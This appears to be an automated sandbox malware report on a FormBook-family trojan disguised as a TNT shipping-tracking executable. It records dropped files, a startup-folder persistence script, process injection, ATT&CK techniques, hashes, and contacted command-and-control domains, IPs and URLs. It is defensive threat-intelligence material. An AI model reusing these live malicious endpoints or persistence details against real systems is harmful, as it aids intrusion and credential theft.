Source: Yara match	File source: 0000000F.00000002.3436884138.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2800235122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3439378043.00000000041F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2839997588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B16283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00B16283
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B16747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00B16747
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00296283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	4_2_00296283
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00296747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	4_2_00296747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Valid Accounts	2 Obfuscated Files or Information	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	1 Masquerading	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	312 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TNT AWB TRACKING DETAILS.exe	39%	Virustotal		Browse
TNT AWB TRACKING DETAILS.exe	53%	ReversingLabs	Win32.Trojan.Nymeria
TNT AWB TRACKING DETAILS.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	53%	ReversingLabs	Win32.Trojan.Nymeria

Source	Detection	Scanner	Label
http://www.medicaresbasics.xyz/fm31/	0%	Avira URL Cloud	safe
http://www.meliorahomes.net	0%	Avira URL Cloud	safe
http://www.meliorahomes.net/ir1u/	0%	Avira URL Cloud	safe
http://www.arcare.partners/0w45/?tB=FpalKbExj&f6Y4tfD=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
medicaresbasics.xyz	3.33.130.190	true	true	unknown
arcare.partners	3.33.130.190	true	true	unknown
ax-0001.ax-msedge.net	150.171.28.10	true	false	high
www.meliorahomes.net	8.217.17.192	true	true	unknown
www.resellnexa.shop	unknown	unknown	false	unknown
www.medicaresbasics.xyz	unknown	unknown	true	unknown
www.arcare.partners	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.medicaresbasics.xyz/fm31/	true	Avira URL Cloud: safe	unknown
http://www.meliorahomes.net/ir1u/	true	Avira URL Cloud: safe	unknown
http://www.arcare.partners/0w45/?tB=FpalKbExj&f6Y4tfD=Yh9TKmzRPl60HcuG3Q/P0EhZpxlwA8+XuG0vFhcMASV/W/a+dSJRszrVCE1vryN9WxHHF1ZftQC141Z//Fk6LSEn3qWTHIIMAUdJFcTrpTiN/JQeOvxH0Rgqs0rYow7etS27iW8=	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.meliorahomes.net	RXSytTjWIT.exe, 0000000E.00000002.3437986748.00000000007DF000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mobsync.exe, 0000000F.00000003.2994300345.0000000007608000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
8.217.17.192	www.meliorahomes.net	Singapore		45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
3.33.130.190	medicaresbasics.xyz	United States		8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1575706
Start date and time:	2024-12-16 08:36:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TNT AWB TRACKING DETAILS.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@14/11@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 67 Number of non-executed functions: 271
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 40.126.53.12, 20.223.36.55, 2.16.158.80, 52.149.20.212, 150.171.28.10, 2.16.158.74
Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:38:56	API Interceptor	36x Sleep call for process: mobsync.exe modified
08:37:21	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
8.217.17.192	H1CYDJ8LQe.exe	Get hash	malicious	FormBook	Browse	www.meliorahomes.net/y4rz/
	z1SupplyInvoiceCM60916_Doc.exe	Get hash	malicious	FormBook	Browse	www.meliorahomes.net/x0tl/
	shipping documents_pdf.exe	Get hash	malicious	FormBook	Browse	www.meliorahomes.net/v6hi/
3.33.130.190	profroma invoice.exe	Get hash	malicious	FormBook	Browse	www.iglpg.online/rbqc/
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	www.tdassetmgt.info/d55l/
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	www.deikamalaharris.info/lrgf/
	ORDER-401.exe	Get hash	malicious	FormBook	Browse	www.likesharecomment.net/nqht/
	Nieuwebestellingen10122024.exe	Get hash	malicious	FormBook	Browse	www.cbprecise.online/cvmn/
	Outstanding Invoices Spreadsheet Scan 00495_PDF.exe	Get hash	malicious	FormBook	Browse	www.binacamasala.com/gnm5/
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.goldstarfootwear.shop/8m07/
	Payment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exe	Get hash	malicious	FormBook	Browse	www.emirates-visa.net/6wmy/
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	www.duskgazes.work/zs4o/
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.hiddenripple.org/om0o/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.meliorahomes.net	H1CYDJ8LQe.exe	Get hash	malicious	FormBook	Browse	8.217.17.192
	rInvoiceCM60916_xlx.exe	Get hash	malicious	FormBook	Browse	8.217.17.192
	z1SupplyInvoiceCM60916_Doc.exe	Get hash	malicious	FormBook	Browse	8.217.17.192
	shipping documents_pdf.exe	Get hash	malicious	FormBook	Browse	8.217.17.192
ax-0001.ax-msedge.net	spectrum.exe	Get hash	malicious	Quasar	Browse	150.171.27.10
	USJFMdzoFi.doc	Get hash	malicious	Unknown	Browse	150.171.27.10
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	150.171.27.10
	tnGNUbHCAK.doc	Get hash	malicious	Unknown	Browse	150.171.28.10
	test.exe	Get hash	malicious	Metasploit	Browse	150.171.27.10
	file.exe	Get hash	malicious	Credential Flusher	Browse	150.171.28.10
	cclent.exe	Get hash	malicious	Quasar	Browse	150.171.28.10
	RuntimeBroker.exe	Get hash	malicious	XenoRAT	Browse	150.171.27.10
	file.exe	Get hash	malicious	Unknown	Browse	150.171.27.10
	Ni2ghr9eUJ.exe	Get hash	malicious	Socks5Systemz	Browse	150.171.27.10

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZONEXPANSIONGB	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	3.38.180.241
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	160.1.18.28
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	52.222.51.228
	profroma invoice.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	https://u13974777.ct.sendgrid.net/ls/click?upn=u001.1GFl1p-2BBYL-2Bhgs5F-2B0NOkrtNxvRU5lHyHn9X7Gay0rMweTw4Bty7YorCE1pBfo679HN2Nod-2BfRWA-2FvzNVU6n0ycgVO9YFLntVOrRszMr10A-3DE-mj_xaXJc0NsC5WAXuVv6HNgzGH9nxkzD8xRdi-2BQVNVTAgV30zfSKc1z4I-2Bc6Qx1hEzdtXusfFTLvSScqQmgK1DgmCe6NsmhCnbLpmZI7EPM56c0IpOXy2jX8FUofqX-2FLwkrDNu-2BJ8VdkhW-2BcibVgB56YvBarWAJ68QdVLDk-2BreYFAbG2RxK5FI2ZOf8OuVaYqzfkm-2FGiI9tY4Y1XN-2FN7Uh8Vtzi-2FP-2B8s9qjOHBuznAYsq-2B4GCewCcJExgcNnMrLH-2B3Pv6vH6wzFQkN2aMTddwwaWvcIkZYQDF7aLn1FYUQMocCkCTJEmkArX-2Bdrge72rYVSFN-2FsI6AAcwN5SA74y-2B4g6Q-3D-3D	Get hash	malicious	Unknown	Browse	3.33.220.150
	https://www.canva.com/link?target=https%3A%2F%2Fgu3.watetiona.com%2FYEcft%2F&design=DAGZLjls8N8&accessRole=viewer&linkSource=document	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	SC_TR11670000_pdf.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	http://home45insurance.blogspot.com	Get hash	malicious	Unknown	Browse	52.223.40.198
	goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.hta	Get hash	malicious	Cobalt Strike, FormBook	Browse	3.33.130.190
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	52.223.13.41
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	sh4.elf	Get hash	malicious	Unknown	Browse	47.245.134.49
	spc.elf	Get hash	malicious	Unknown	Browse	8.221.71.12
	ppc.elf	Get hash	malicious	Unknown	Browse	47.241.21.57
	IGz.sh4.elf	Get hash	malicious	Mirai	Browse	47.250.151.135
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	47.243.188.238
	rebirth.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	47.244.140.11
	TRC.mpsl.elf	Get hash	malicious	Mirai	Browse	47.252.147.57
	TRC.arm.elf	Get hash	malicious	Mirai	Browse	47.241.69.70
	https://asgbucket.oss-ap-southeast-3.aliyuncs.com/class/initiate/BMB1tcTf.txt	Get hash	malicious	Unknown	Browse	47.254.218.16
	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	8.215.225.213

Process:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.995659195193332
Encrypted:	true
SSDEEP:	6144:8p6w1tgASKv0fX6z1EUB/97coLB5ODvZ7j/x/UJBWljLKUe:88NAxQX6z1xB6govZ7jsBMjLKD
MD5:	00F7B01045CC6E87A4FF61FBFA36024B
SHA1:	D356E8923E21AEAF1D9AA46CCB2A9CD19063F0BA
SHA-256:	21A04C493F8CC2435BAC0A98F674F5E7D254736CA270EB14CC2FF872C9135D66
SHA-512:	B15C14FE4EBF2733438DF8247EFAF89AF592798687ECA83D845CB80CA1D465A5E4D2EF9C7D28EAC2AAC8B2CC304D6EBE68E57680BF9A0E47EA29C506C6E0DBCD
Malicious:	false
Reputation:	low
Preview:	.m...8GAX...^.....AW..gSB...XM48GAXE83WZLCS2CAT9SEOPJDA7XM.8GAVZ.=W.E.r.B....-&#j43X??UUg"9+V\#z.&s@6/tP=e...d,X<(.5JK\|E83WZLC3J.iY4.r0-.\|W?....b%_.M..oR$.N...s0-..^;%.X .XE83WZLC.wCA.8RE....A7XM48GA.E:2\[GCS`GAT9SEOPJD.#XM4(GAX5<3WZ.CS"CAT;SEIPJDA7XM28GAXE83WHCS0CAT9SEMP..A7HM4(GAXE(3WJLCS2CAD9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83y.);'2CA.iWEO@JDAe\M4(GAXE83WZLCS2CAt9S%OPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CA

C:\Users\user\AppData\Local\Temp\aut1654.tmp

Download File

Process:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
File Type:	data
Category:	dropped
Size (bytes):	11020
Entropy (8bit):	7.471869069791527
Encrypted:	false
SSDEEP:	192:kbF9LmrzfHXxzgDqn8jmTcKGUb+TSG5MC0tvFpSFEg9mrSSr:kbF9YLBsq8KTzGVTS4MC0/g9mr/r
MD5:	9EBED17C492EA6BFCD6B9E6CCAF46C36
SHA1:	1FB0D2779A432320ECB5BF819B1A5268913FC228
SHA-256:	DBE63FA039640D044209C863F205040FE6CD51C938A1F911F27AAC6703861B01
SHA-512:	542867CE339EF6BDAA73EAD94B023A6865842ADBBFE068E4B064B4FF5206E720D1A4060318E0AF30E9D883908749BB15E8E980421205203AE0239632ABF179A9
Malicious:	false
Reputation:	low
Preview:	EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.\|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

C:\Users\user\AppData\Local\Temp\autDCC5.tmp

Download File

Process:	C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.995659195193332
Encrypted:	true
SSDEEP:	6144:8p6w1tgASKv0fX6z1EUB/97coLB5ODvZ7j/x/UJBWljLKUe:88NAxQX6z1xB6govZ7jsBMjLKD
MD5:	00F7B01045CC6E87A4FF61FBFA36024B
SHA1:	D356E8923E21AEAF1D9AA46CCB2A9CD19063F0BA
SHA-256:	21A04C493F8CC2435BAC0A98F674F5E7D254736CA270EB14CC2FF872C9135D66
SHA-512:	B15C14FE4EBF2733438DF8247EFAF89AF592798687ECA83D845CB80CA1D465A5E4D2EF9C7D28EAC2AAC8B2CC304D6EBE68E57680BF9A0E47EA29C506C6E0DBCD
Malicious:	false
Preview:	.m...8GAX...^.....AW..gSB...XM48GAXE83WZLCS2CAT9SEOPJDA7XM.8GAVZ.=W.E.r.B....-&#j43X??UUg"9+V\#z.&s@6/tP=e...d,X<(.5JK\|E83WZLC3J.iY4.r0-.\|W?....b%_.M..oR$.N...s0-..^;%.X .XE83WZLC.wCA.8RE....A7XM48GA.E:2\[GCS`GAT9SEOPJD.#XM4(GAX5<3WZ.CS"CAT;SEIPJDA7XM28GAXE83WHCS0CAT9SEMP..A7HM4(GAXE(3WJLCS2CAD9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83y.);'2CA.iWEO@JDAe\M4(GAXE83WZLCS2CAt9S%OPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CA

C:\Users\user\AppData\Local\Temp\autDDC0.tmp

Download File

Process:	C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe
File Type:	data
Category:	dropped
Size (bytes):	11020
Entropy (8bit):	7.471869069791527
Encrypted:	false
SSDEEP:	192:kbF9LmrzfHXxzgDqn8jmTcKGUb+TSG5MC0tvFpSFEg9mrSSr:kbF9YLBsq8KTzGVTS4MC0/g9mr/r
MD5:	9EBED17C492EA6BFCD6B9E6CCAF46C36
SHA1:	1FB0D2779A432320ECB5BF819B1A5268913FC228
SHA-256:	DBE63FA039640D044209C863F205040FE6CD51C938A1F911F27AAC6703861B01
SHA-512:	542867CE339EF6BDAA73EAD94B023A6865842ADBBFE068E4B064B4FF5206E720D1A4060318E0AF30E9D883908749BB15E8E980421205203AE0239632ABF179A9
Malicious:	false
Preview:	EA06..t.......V;...8....[4.p. ..0...=........f.M@.......X...,..8....t..Mf.[..c2.N&3)..$."..l...M.I..a2....@.......,.`.v.f..E.9...,.@......S.i..cf..@.@..gd...h.q...}.P....9...x......r..Y..."cb.#&........f.4.Yl.`..Yf..`.d.....r...$..&..i....>g.[..d..L.X:.9....e.v.....k0.L.....o0.u&....j...'....O&sy...f...T.0..Yrd....Jb.....e5.L&.0..`..s0......Y3.!...2....f..p.... ...d.....k3.R....-.Qd....`.......m1.`.& ....0..R_..se...@......T..m1.M.....U.k4...... .v.. ...m2.>@.......X.......%......0.............f..^......I.=..g......%..J........C...B....$L..4..c3.M..>)...4. l.Y....A.!.....f..@.....p.@.l.i..n.A.X@.....4..@ >....5..g......e. f.[,.ee. .&s.$....PR....N.=.OP.\|.....-.m0.x...4..,.p....M&.i..)1...[,....M,`.....b..<.).ae...2........AZ..8LlVI....'Y@.k $.....fr.....g7.d'.0Q..Z.K......5....._.._@y...........&@.~..&.0.D.#.Gz..f.P....@.)...f y...,s....d...D....-d.C......s./..Yd.....%.5....0..Yf...)...,fa0..x.k4..k.Y..$........Nf..<......].l`..0.W.5..(..u....#../.b....@..e.........

C:\Users\user\AppData\Local\Temp\autE522.tmp

Download File

Process:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
File Type:	data
Category:	dropped
Size (bytes):	287744
Entropy (8bit):	7.995659195193332
Encrypted:	true
SSDEEP:	6144:8p6w1tgASKv0fX6z1EUB/97coLB5ODvZ7j/x/UJBWljLKUe:88NAxQX6z1xB6govZ7jsBMjLKD
MD5:	00F7B01045CC6E87A4FF61FBFA36024B
SHA1:	D356E8923E21AEAF1D9AA46CCB2A9CD19063F0BA
SHA-256:	21A04C493F8CC2435BAC0A98F674F5E7D254736CA270EB14CC2FF872C9135D66
SHA-512:	B15C14FE4EBF2733438DF8247EFAF89AF592798687ECA83D845CB80CA1D465A5E4D2EF9C7D28EAC2AAC8B2CC304D6EBE68E57680BF9A0E47EA29C506C6E0DBCD
Malicious:	false
Preview:	.m...8GAX...^.....AW..gSB...XM48GAXE83WZLCS2CAT9SEOPJDA7XM.8GAVZ.=W.E.r.B....-&#j43X??UUg"9+V\#z.&s@6/tP=e...d,X<(.5JK\|E83WZLC3J.iY4.r0-.\|W?....b%_.M..oR$.N...s0-..^;%.X .XE83WZLC.wCA.8RE....A7XM48GA.E:2\[GCS`GAT9SEOPJD.#XM4(GAX5<3WZ.CS"CAT;SEIPJDA7XM28GAXE83WHCS0CAT9SEMP..A7HM4(GAXE(3WJLCS2CAD9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83y.);'2CA.iWEO@JDAe\M4(GAXE83WZLCS2CAt9S%OPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CAT9SEOPJDA7XM48GAXE83WZLCS2CA

C:\Users\user\AppData\Local\Temp\autE580.tmp

Download File

Process:	C:\Users\user\AppData\Local\hurtling\jailkeeper.exe
File Type:	data
Category:	dropped
Size (bytes):	11020
Entropy (8bit):	7.471869069791527
Encrypted:	false
SSDEEP:	192:kbF9LmrzfHXxzgDqn8jmTcKGUb+TSG5MC0tvFpSFEg9mrSSr:kbF9YLBsq8KTzGVTS4MC0/g9mr/r
MD5:	9EBED17C492EA6BFCD6B9E6CCAF46C36
SHA1:	1FB0D2779A432320ECB5BF819B1A5268913FC228
SHA-256:	DBE63FA039640D044209C863F205040FE6CD51C938A1F911F27AAC6703861B01
